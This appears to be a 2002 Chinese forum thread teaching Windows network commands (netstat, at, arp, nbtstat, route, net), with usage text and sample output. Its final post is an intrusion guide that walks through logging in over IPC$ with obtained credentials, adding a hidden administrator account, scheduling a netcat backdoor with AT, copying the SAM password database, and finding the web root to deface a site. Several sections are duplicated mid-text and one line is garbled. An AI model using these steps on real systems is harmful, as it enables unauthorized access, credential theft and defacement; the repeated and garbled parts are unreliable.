    TCP adsl1688:epmap adsl1688:0 LISTENING
    TCP adsl1688:microsoft-ds adsl1688:0 LISTENING
    TCP adsl1688:1025 adsl1688:0 LISTENING
    TCP adsl1688:1027 adsl1688:0 LISTENING 【端口类型 TCP 端口 1027 监听状态】

    TCP adsl1688:1131 adsl1688:0 LISTENING
    …………………………………………

    UDP adsl1688:epmap *:*
    UDP adsl1688:microsoft-ds *:*
    UDP adsl1688:1026 *:* 【端口类型 UDP 端口 1026】
    …………………………………………
    用此参数可以清楚显示出你的计算机当前所开放的所有端口,其中包括TCP端口和UDP端口。我们可以经常的使用此参数,以此来查看计算机的系统服务是否正常,是否被“黑客”留下后门,木马等。我觉得我们应该有这么一个习惯,在刚刚装了系统配置好服务器以后我就会运行一下netstat -a看看系统开放了什么端口,并记录下来,以便以后作为参考使用,当发现有不明的端口时就可以及时的做出对策。由于这个参数同时还会显示出当前计算机有什么人的IP正连接着你的服务器,所以也是一种实时入侵检测工具,如发现有个IP连接着不正常的端口,你也可以及时做出有效对策。

    C:/> Netstat -n -a

    Active Connections 【活动的连接】

    TCP 192.168.0.1:139 0.0.0.0:0 LISTENING
    ……
    TCP 218.76.6.122:139 0.0.0.0:0 LISTENING
    TCP 218.76.6.122:3038 61.186.175.113:2887 ESTABLISHED 【现在就可以很清楚的看见IP地址和端口名了】
    UDP 0.0.0.0:135 *:*
    …………………………………… .
    2.查看以太网统计信息
    C:/>netstat -e -a
    Interface Statistics(通信数据统计)

    Received【收到的】 Sent【发送的】

    Bytes 4054478 717225
    Unicast packets 7804 6158
    Non-unicast packets 283 286
    Discards 0 0
    Errors 0 0
    Unknown protocols【未知协议】 1564

    3.查看路由信息

    C:/>netstat -r

    Route Table【路由表】
    ===========================================================================
    Interface List【接口列表】
    ……………………………………
    ===========================================================================
    Active Routes:【活动路由】
    Network Destination【主机】 Netmask【子网掩码】 Gateway【网关】 Interface【接口】 Metric【跳数】
    (关于Metric来源于几何的距量,我们用它来定义两router之间的距离(或称为Cost),计算计算公式为 10的8次方 / 速度(bps),也就是说,带宽越大的线路線路其Metric越小,可视为距离越近。谢谢坛主NeeKol的教导)

    ………………………………………………
    Default Gateway:【缺省网关】 218.76.6.122
    ===========================================================================
    Persistent Routes:
    None
    LISTENING 【端口类型 TCP 端口 1027 监听状态】

    TCP adsl1688:1131 a

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    AT

    前面提及了几个网络检测分析工具,IP探测工具Ping、网络统计工具NetStat、跟踪路由工具Tracert,提一个较为有趣的网络命令吧。
    谈到这里不得不提一下ping plotter这个路由跟踪软件了(呵呵,走题了),它几乎囊括了上面三个网络命令的所有功能,并且提供了数据和图形两种表达方式,使得其检测分析结果更加直观和易于理解。具体ping plotter的下载和使用大家可以先自己学习一下。
    轻松一点,接着来吧。其实下面这个网络命令最理想的是和net命令集中的net start配合使用比较好,就先提提吧。
    usage:
    AT 命令安排在特定日期和时间运行命令和程序。要使用 AT 命令,计划服务必须已在运行中。

    AT [//computername] [ [id] [/DELETE] | /DELETE [/YES]
    AT [//computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...] "command"

    //computername 指定远程计算机。 如果省略这个参数,会计划在本地计算机上运行命令。
    id 指定给已计划命令的识别号。
    /delete 删除某个已计划的命令。如果省略 id,计算机上所有已计划的命令都会被删除。
    /yes 不需要进一步确认时,跟删除所有作业的命令一起使用。
    time 指定运行命令的时间。
    /interactive 允许作业在运行时,与当时登录的用户桌面进行交互。
    /every:date[,...] 每个月或每个星期在指定的日期运行命令。如果省略日期,则默认为在每月的本日运行。
    /next:date[,...] 指定在下一个指定日期(如,下周四)运行命令。如果省略日期,则默认为在每月的本日运行。
    "command" 准备运行的 Windows NT 命令或批处理程序。

    二.实例
    1.建立新任务(先土一点吧,net start以后…………)
    C:/> AT 23:00 Start C:/勇气.mp3
    新加了一项作业,其作业 ID = 1 【现在我们新建立了一个任务 在23.00 系统将自动播放“勇气”这首歌曲】

    2.查看任务(schedule)

    C:/> AT 【查看已经指定的任务】

    状态 ID 日期 时间 命令行
    -------------------------------------------------
    1 今天 下午 23:00 Start C:/勇气.mp3

    3.删除此命令
    C:/> AT 1 /Delete 【删除1号任务】
    C:/>at 【此时查看,空】
    清单是空的。

    AT的命令只能在2000下用


    Edited by - 老虎 重新编辑於 2002-11-09 18:03:24

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    ARP

    一、基础知识
    ARP是一个重要的TCP/IP协议,并且用于确定对应IP地址的网卡物理地址。arp命令的使用,能够使你查看本地计算机或另一台计算机的ARP高速缓存中的当前内容。此外,使用arp命令,也可以用人工方式输入静态的网卡物理/IP地址,你可能会使用这种方式为缺省网关和本地服务器等常用主机进行这项操作,有助于减少网络上的信息量。
    按照缺省设置,ARP高速缓存中的项目是动态的,每当发送一个指定地点的数据报且高速缓存中不存在当前项目时,ARP便会自动添加该项目。一旦高速缓存的项目被输入,它们就已经开始走向失效状态。因此,如果ARP高速缓存中项目很少或根本没有时,请不要奇怪,通过另一台计算机或路由器的ping命令即可添加。所以,需要通过arp命令查看高速缓存中的内容时,请最好先ping 此台计算机(不能是本机发送ping命令)。
    usage:
    Displays and modifies the IP-to-Physical address translation tables used by address resolution protocol (ARP).(显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或物理地址翻译表)
    ARP -s inet_addr eth_addr [if_addr]
    ARP -d inet_addr [if_addr]
    ARP -a [inet_addr] [-N if_addr]

    -a Displays current ARP entries by interrogating the current protocol data. If inet_addr is specified, the IP and Physical addresses for only the specified computer are displayed. If more than one network interface uses ARP, entries for each ARP table are displayed.(通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址)
    -g Same as -a.(与 -a 相同)
    inet_addr Specifies an internet address.(以加点的十进制标记指定 IP 地址)
    -N if_addr Displays the ARP entries for the network interface specified by if_addr.(显示由 if_addr 指定的网络界面 ARP 项)
    -d Deletes the host specified by inet_addr. inet_addr may be wildcarded with * to delete all hosts.(删除由 inet_addr 指定的项)
    -s Adds the host and associates the Internet address inet_addr with the Physical address eth_addr. The Physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent.(在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除)
    eth_addr Specifies a physical address.(指定物理地址)
    if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified.If not present, the first applicable interface will be used..(指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口)

    二、实例
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) 版权所有 1985-2000 Microsoft Corp.

    C:/>ping 192.168.0.10

    Pinging 192.168.0.10 with 32 bytes of data:

    Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
    Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
    Reply from 192.168.0.10: bytes=32 time<10ms TTL=128
    Reply from 192.168.0.10: bytes=32 time<10ms TTL=128

    Ping statistics for 192.168.0.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

    C:/>arp -a【用于查看高速缓存中的所有项目】

    Interface: 192.168.0.65 on Interface 0x2
    Internet Address Physical Address Type
    192.168.0.10 00-00-00-11-22-33 dynamic
    192.168.0.68 00-80-c8-ad-d2-cd dynamic
    192.168.0.255 12-50-ba-00-22-98 dynamic

    C:/>arp -s 192.168.0.10 00-00-00-11-22-33【向ARP高速缓存中人工输入一个静态项目】

    Interface: 192.168.0.65 on Interface 0x02
    Internet Address Physical Address Type
    192.168.0.10 00-00-00-11-22-33 static【静态的】
    192.168.0.68 00-80-c8-ad-d2-cd dynamic【动态的】
    192.168.0.255 12-50-ba-00-22-98 dynamic

    C:/>arp -d 192.168.0.10

    C:/>arp -a
    Interface: 192.168.0.65 on Interface 0x02
    Internet Address Physical Address Type
    192.168.0.68 00-80-c8-ad-d2-cd dynamic
    192.168.0.255 12-50-ba-00-22-98 dynamic

    具体此命令使用http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10207/79487.html


    _addr. The Physical address is given as 6 hexadecimal bytes separated by hyphens. The entry is permanent.(在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的,即在超时到期后项自动从缓存删除)
    eth_addr Specifies a physical address.(指定物理地址)
    if_addr If present, this specifies the Internet address of the interface whose address translation table should be modified.If not present, the first applicable interface will be used..(指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口)

    二、实例
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) 版权所有 1985-2000 Microsoft Corp.

    C:/>ping 192.168.0.10

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    NBTSTAT

    一、基础知识
    netstat和nbtstat可以说都是Windows下的网络检测工具(NETSTAT命令:用于查询与某类信息有关的子系统;NBTSTAT命令:用于查看当前基于NETBIOS的TCP/IP连接状态),都需要在安装了TCP/IP协议以后才可以使用的。

    Usage:
    Displays protocol statistics and current TCP/IP connections using NBT (NetBIOS over TCP/IP).(诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接)

    NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [interval] ]

    -a (adapter status) Lists the remote machine's name table given its name(使用远程计算机的名称列出其名称表)
    -A (Adapter status) Lists the remote machine's name table given its IP address.(使用远程计算机的 IP 地址并列出名称表(其实用处不大,-a已经包括了此功能))
    -c (cache) Lists NBT's cache of remote [machine] names and their IP
    addresses(给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容)
    -n (names) Lists local NetBIOS names.(列出本地 NetBIOS 名称)
    -r (resolved) Lists names resolved by broadcast and via WINS(要通过广播或 WINS 来解析和注册的名称数)
    -R (Reload) Purges and reloads the remote cache name table(清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件(这个参数就是清除netstat -c所能看见的Cache里的IP缓存的))
    -S (Sessions) Lists sessions table with the destination IP addresses(显示客户端和服务器会话,只通过 IP 地址列出远程计算机)
    -s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.(显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称(此参数和-S差不多,只是这个会把对方的NetBIOS名给解析出来))
    -RR (ReleaseRefresh) Sends Name Release packets to WINs and then, starts Refresh(释放在 WINS 服务器上注册的 NetBIOS 名称,然后刷新它们的注册)

    RemoteName Remote host machine name.
    IP address Dotted decimal representation of the IP address.
    interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.(重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息)

    二、实例

    1.查看连接状态
    C:/>nbtstat -a adsl1688

    本地连接 3:
    Node IpAddress: [218.76.4.35] Scope Id: []

    NetBIOS Remote Machine Name Table

    Name Type Status
    ---------------------------------------------
    ADSL1688 <00> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    WORKGROUP <1E> GROUP Registered
    ADSL1688 <20> UNIQUE Registered
    …………………………

    MAC Address = 44-45-53-54-77-77

    本地连接:
    Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Remote Machine Name Table

    Name Type Status
    ---------------------------------------------
    ADSL1688 <00> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    WORKGROUP <1E> GROUP Registered
    ADSL1688 <20> UNIQUE Registered
    WORKGROUP <1D> UNIQUE Registered
    LIUQUch <03> GROUP Registered
    ADSL1688 <03> UNIQUE Registered

    MAC Address = 00-07-53-00-4E-B7
    从上面就可以知道我的计算机当前计算机的NetBios名为adsl1688属于workgroup域内,当前有liuquch登陆的本计算机,呵呵,全都出来了。此参数也可nbtstat -a 192.168.0.65,显示结果和上面的相同。

    2.列出缓存内容
    C:/>nbtstat -c

    本地连接 3:
    Node IpAddress: [218.76.4.35] Scope Id: []

    No names in cache

    本地连接:
    Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Remote Cache Name Table

    Name Type Host Address Life [sec]
    ------------------------------------------------------------
    WORKGROUP <20> UNIQUE 192.168.0.68 5597
    从上面就可以知道你刚刚和IP为192.168.0.68的计算机的NetBIOS连接过。呵呵,不得不提一句,这个命令提供给了“黑客”在入侵了对方的主机以后进而入侵到内部网的一个有利的线索。

    3.显示连接对话内容
    C:\>nbtstat -S

    本地连接 3:
    Node IpAddress: [218.76.4.35] Scope Id: []

    NetBIOS Connection Table

    Local Name State In/Out Remote Host Input Output

    ----------------------------------------------------------------------------

    ADSL1688 <03> Listening

    本地连接:
    Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Connection Table

    Local Name State In/Out Remote Host Input Output

    ----------------------------------------------------------------------------

    ADSL1688 <00> Connected Out 192.168.0.10 4MB 125KB
    ADSL1688 <03> Listening
    LIUQUch <03> Listening
    ………………………………

    从上面就可以知道,该计算机现在正在和192.168.0.68进行会话,看得出是在复制文件,而且是从对方往自己的计算机里复制。(注以上显示数据部分改动过,以防万一,还是小心为妙)。

    e IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Remote Machine Name Table

    Name Type Status
    ---------------------------------------------
    ADSL1688 <00> UNIQUE Registered
    WORKGROUP <00> GROUP Registered
    WORKGROUP <1E> GROUP Registered
    ADSL1688 <20> UNIQUE Registered
    WORKGROUP <1D> UNIQUE Registered
    LIUQUch <03> GROUP Registered
    ADSL1688 <03> UNIQUE Registered

    MAC Address = 00-07-53-00-4E-B7
    从上面就可以知道我的计算机当前计算机的NetBios名为adsl1688属于workgroup域内,当前有liuquch登陆的本计算机,呵呵,全都出来了。此参数也可nbtstat -a 192.168.0.65,显示结果和上面的相同。

    2.列出缓存内容
    C:/>nbtstat -c

    本地连接 3:
    Node IpAddress: [218.76.4.35] Scope Id: []

    No names in cache

    本地连接:
    Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Remote Cache Name Table

    Name Type Host Address Life [sec]
    ------------------------------------------------------------
    WORKGROUP <20> UNIQUE 192.168.0.68 5597
    从上面就可以知道你刚刚和IP为192.168.0.68的计算机的NetBIOS连接过。呵呵,不得不提一句,这个命令提供给了“黑客”在入侵了对方的主机以后进而入侵到内部网的一个有利的线索。

    3.显示连接对话内容
    C:\>nbtstat -S

    本地连接 3:
    Node IpAddress: [218.76.4.35] Scope Id: []

    NetBIOS Connection Table

    Local Name State In/Out Remote Host Input Output

    ----------------------------------------------------------------------------

    ADSL1688 <03> Listening

    本地连接:
    Node IpAddress: [192.168.0.65] Scope Id: []

    NetBIOS Connection Table

    Local Name State In/Out Remote Host Input Output

    ----------------------------------------------------------------------------

    AD

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    ROUTE
    一. 基础知识
    Route是用来显示、人工添加和修改路由表项目的。我们知道我们在因特网上冲浪,并不是直接和我们要访问的主机通讯,而是要通过许多的路由器。我们在用PING这个命令时就看出来了。我们就再举那个例子,比如我们要访问新浪网,它的信息传送到我们的本机上要经过11个路由,但其实它也可以选择其它的路径来到我们本机,只是因为路由器有选择最短路径的能力所以它走现在这条路了,现在假如我们已经找到了一个其他的主机,让它从肉鸡这条路上过来,我们就可以用route命令修改路由表项目,让它往我们指定的路径上过来。(写得太差劲,早到一段比较好的说明,又不想将此段删掉,留下吧)
    大多数主机一般都是驻留在只连接一台路由器的网段上。由于只有一台路由器,因此不存在使用哪一台路由器将数据报发表到远程计算机上去的问题,该路由器的IP地址可作为该网段上所有计算机的缺省网关来输入。但是,当网络上拥有两个或多个路由器时,你就不一定想只依赖缺省网关了。实际上你可能想让你的某些远程IP地址通过某个特定的路由器来传递,而其他的远程IP则通过另一个路由器来传递。在这种情况下,你需要相应的路由信息,这些信息储存在路由表中,每个主机和每个路由器都配有自己独一无二的路由表。大多数路由器使用专门的路由协议来交换和动态更新路由器之间的路由表。但在有些情况下,必须人工将项目添加到路由器和主机上的路由表中。Route就是用来显示、人工添加和修改路由表项目的。

    usage:
    ROUTE [-f] [-p] [command [destination]
    [MASK netmask] [gateway] [METRIC metric] [IF interface]
    -f Clears the routing tables of all gateway entries.If this is used in conjunction with one of the commands, the tables are cleared prior to running the command.(清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除)
    -p When used with the ADD command, makes a route persistent across boots of the system. By default, routes are not preserved when the system is restarted. Ignored for all other commands,which always affect the appropriate persistent routes. This option is not supported in Windows 95.(该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。该选项在win95下不支持)
    command One of these:
    PRINT Prints a route(打印路由)
    ADD Adds a route(添加路由)
    DELETE Deletes a route(删除路由)
    CHANGE Modifies an existing route(修改已存在的路由)
    destination Specifies the host.(指定主机)
    MASK Specifies that the next parameter is the 'netmask' value.
    netmask Specifies a subnet mask value for this route entry.If not specified, it defaults to 255.255.255.255.(指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255)
    gateway Specifies gateway.(指定网关)
    interface the interface number for the specified route.
    METRIC specifies the metric, ie. cost for the destination.(指定跳数)

    All symbolic names used for destination are looked up in the network database file NETWORKS. The symbolic names for gateway are looked up in the host name database file HOSTS.If the command is PRINT or DELETE. Destination or gateway can be a wildcard,(wildcard is specified as a star '*'), or the gateway argument may be omitted.(名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数)

    二.实例

    这个命令不太好贴出来,举例说明吧。

    1.tracert -d http://www.sina.com.cn/
    显示my host到http://www.sina.com.cn/所经过的所有路由途径。显示有途径11个路由。
    2.显示路由表中的当前项:
    C:/>route print
    =======================================================================
    Interface List
    …………………………

    和netstat -r显示路由信息的结果差不多。

    3.把路由项目添加给路由表:route add
    假设:新浪网的IP地址是61.145.113.87,我们到达它要经过11个路由,我们刚开始找到的那个主机,说明白点就是肉鸡的ip为xxx.xxx.xxx.xxx,子网掩码为255.255.255.224。我们就可以这样达到我们的目的:

    route add 61.145.113.87 mask 255.255.255.224 xxx.xxx.xxx.xxx metric 11

    4.修改数据的传输路由:route change
    此参数能够改变数据的传输路由,但不能改变数据的目的地。
    一样的道理,我们可自己选择一条更短的路径来访问。比如我们刚才让它绕到很远去访问新浪网,现在我又不想绕这么大的弯了。于是具体操作如下:

    route add 61.145.113.87 mask 255.255.255.224 61.187.255.81 metric 4

    四个路由当然比十一个路由要快得多,是不是?

    5.从路由表中删除路由:route delete

    t supported in Windows 95.(该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。该选项在win95下不支持)
    command One of these:
    PRINT Prints a route(打印路由)
    ADD Adds a route(添加路由)
    DELETE Deletes a route(删除路由)
    CHANGE Modifies an existing route(修改已存在的路由)
    destination Specifies the host.(指定主机)
    MASK Specifies that the next parameter is the 'netmask' value.
    netmask Specifies a subnet mask value for this route entry.If not specified, it defaults to 255.255.255.255.(指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255)
    gateway Specifies gateway.(指定网关)
    interface the interface number for the specified route.
    METRIC specifies the metric, ie. cost for the destination.(指定跳数)

    All symbolic names used

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    net
    这个命令的语法是: 可用的命令包括:
    NET ACCOUNTS NET HELP NET SHARE
    NET COMPUTER NET HELPMSG NET START
    NET CONFIG NET LOCALGROUP NET STATISTICS
    NET CONFIG SERVER NET NAME NET STOP
    NET CONFIG WORKSTATION NET PAUSE NET TIME
    NET CONTINUE NET PRINT NET USE
    NET FILE NET SEND NET USER
    NET GROUP NET SESSION NET VIEW

    NET HELP SERVICES 列出用户可以启动的网络服务。
    NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。
    NET HELP command MORE 用于逐屏显示帮助。


    a.net view

    这个命令的语法是:NET VIEW [computername /DOMAIN[:domainname]]
    NET VIEW /NETWORK:NW [computername]

    NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,
    它就会显示当前域或网络上的计算机上的列表。

    computername 指用户希望浏览其共享资源的计算机。
    /DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,
    就会显示局域网络上的所有域。
    /NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算
    机名,就会显示NetWare 网络中那个计算机上的可用资源。

    至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行
    net view ***.***.**.*** 就可以了


    b.net use

    这个命令的语法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
    [/USER:[domainname]username]
    [[/DELETE] [/PERSISTENT:{YES NO}]]

    NET USE [devicename *] [password *]] [/HOME]

    NET USE [/PERSISTENT:{YES NO}]


    NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的
    连接。当不带选项使用本命令时,它会列出计算机的连接。

    devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型
    的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入
    一个星号来代替一个指定的设备名可以分配下一个可用设备名。

    computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,
    就要将双反斜线 () 和计算机名一起用引号 (" ")括起来。计算机名
    可以有1 到15 个 字符。

    sharename 指共享资源的网络名字。
    volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务
    (Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务
    器) 并使之与NetWare 服务器相连。
    password 指访问共享资源所需要的密码。


    * 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。
    /USER 指定连接时的一个不同的用户名。
    domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。
    username 指定登录的用户名。
    /HOME 将用户与他们的宿主目录相连。
    /DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。
    /PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。
    YES 在连接产生时保存它们,并在下次登录时恢复它们。
    NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被
    恢复。可以使用 /DELETE 选项开关来删除永久连接。
    NET STATISTICS
    NET CONFIG SERVER NET NAME NET STOP
    NET CONFIG WORKSTATION NET PAUSE NET TIME
    NET CONTINUE NET PRINT NET USE
    NET FILE NET SEND NET USER
    NET GROUP NET SESSION NET VIEW

    NET HELP SERVICES 列出用户可以启动的网络服务。
    NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。
    NET HELP command MORE 用于逐屏显示帮助。


    a.net view

    这个命令的语法是:NET VIEW [computername /DOMAIN[:domainname]]
    NET VIEW /NETWORK:NW [computername]

    NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,
    它就会显示当前域或网络上的计算机上的列表。

    computername 指用户希望浏览其共享资源的计算机。
    /DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,
    就会显示局域网络上的所有域。
    /NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算
    机名,就会显示NetWare 网络中那个计算机上的可用资源。

    至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行
    net view ***.***.**.*** 就可以了


    b.net use

    这个命令的语法是:NET USE [devicename *] [computernamesharename[volume] [password *]]
    [/USER:[domainname]username]
    [[/DELETE] [/PERSISTENT:{YES NO}]]

    NET USE [devicename *] [password *]] [/HOME]

    NET USE [/PERSISTENT:{YES NO}]


    NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的
    连接。当不带选项使用本命令时,它会列出计算机的连接。

    devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型
    的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入
    一个星号来代替一个指定的设备名可以分配下一个可用设备名。

    computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,
    就要将双反斜线 () 和计算机名一起用引号 (" ")括起来。计算机名
    可以有1 到15 个 字符。

    sharename 指共享资源的网络名字。
    volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务
    (Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务
    器) 并使之与NetWare 服务器相连。
    password 指访问共享资源所需要的密码。


    * 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。
    /USER 指定连接时的一个不同的用户名。
    domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。
    username 指定登录的用户名。
    /HOME 将用户与他们的宿主目录相连。
    /DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。
    /PERSISTENT 控制

    ----------------------------------------------------------

    作者: 老虎
    日期: 2002-11-09
    内容:
    一般黑客入侵所需要的几个常用命令
    如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。

    1:NET

    只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

    这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1

    net use //127.0.0.1/ipc$ "123456" /user:"hbx"

    退出的命令是

    net use //127.0.0.1/ipc$ /delte

    下面的操作你必须登陆后才可以用.登陆的方法就在上面.

    ----------------------

    下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

    我们加一个heibai的用户密码为lovechina

    net user heibai lovechina /add

    只要显示命令成功,那么我们可以把他加入Administrator组了.

    net localgroup Administrators heibai /add

    ----------------------

    这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

    net use z://127.0.0.1/c$

    ----------------------

    net start telnet

    这样可以打开对方的TELNET服务.

    ----------------------

    这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

    net user guest /active:yes

    ----------------------

    这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

    net user guest lovechina

    net命令果然强大啊!

    2:at

    一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

    那么需要用AT命令,这里假设你已经登陆了那个服务器。

    你首先要得到对方的时间,

    net time //127.0.0.1

    将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

    at //127.0.0.1 12:3 nc.exe

    这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

    这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

    等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

    3:telnet

    这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

    telnet 127.0.0.1 99

    这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

    4:FTP

    它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,?..,以及FTP服务器.

    在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321

    ftp http://www.51.net/

    他会要求输入用户,成功后会要求输入密码.

    ----------------------

    下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:/下,传到对方D:/

    put c:/index.htm d:/

    假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

    get c:/index.htm d:/

    5:copy

    下嫖宜邓翟跹驯镜氐奈募粗频蕉苑接才躺先ィ枰⒑肐PC$连接才有效。

    这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

    copy index.htm //127.0.0.1/c$/index.htm

    ----------------------

    如果你要复制到D盘下把C改为D,就行了!

    copy index.htm //127.0.0.1/d$/index.htm

    ----------------------

    如果你要把他复制到WINNT目录里

    就要把输入

    copy index.htm //127.0.0.1/admin$/index.htm

    admin$是winnt

    ----------------------

    要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:/winnt/repair/sam._ sam._是数据库的文件名

    下面就把127.0.0.1的数据库复制到本地C盘下

    copy //127.0.0.1/admin$/repair/sam._ c:/

    ----------------------

    6:set

    如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

    下面是我得到的结果!我来分析它,只是找主页在那而已。

    COMPUTERNAME=PENTIUMII
    ComSpec=D:/WINNT/system32/cmd.exe
    CONTENT_LENGTH=0
    GATEWAY_INTERFACE=CGI/1.1
    HTTP_ACCEPT=*/*
    HTTP_ACCEPT_LANGUAGE=zh-cn
    HTTP_CONNECTION=Keep-Alive
    HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
    HTTP_ACCEPT_ENCODING=gzip, deflate
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
    NUMBER_OF_PROCESSORS=1
    Os2LibPath=D:/WINNT/system32/os2/dll;
    OS=Windows_NT
    Path=D:/WINNT/system32;D:/WINNT
    PATHEXT=.COM;.EXE;.BAT;.CMD
    PATH_TRANSLATED=E:/vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:/vlroot
    PROCESSOR_ARCHITECTURE=x86
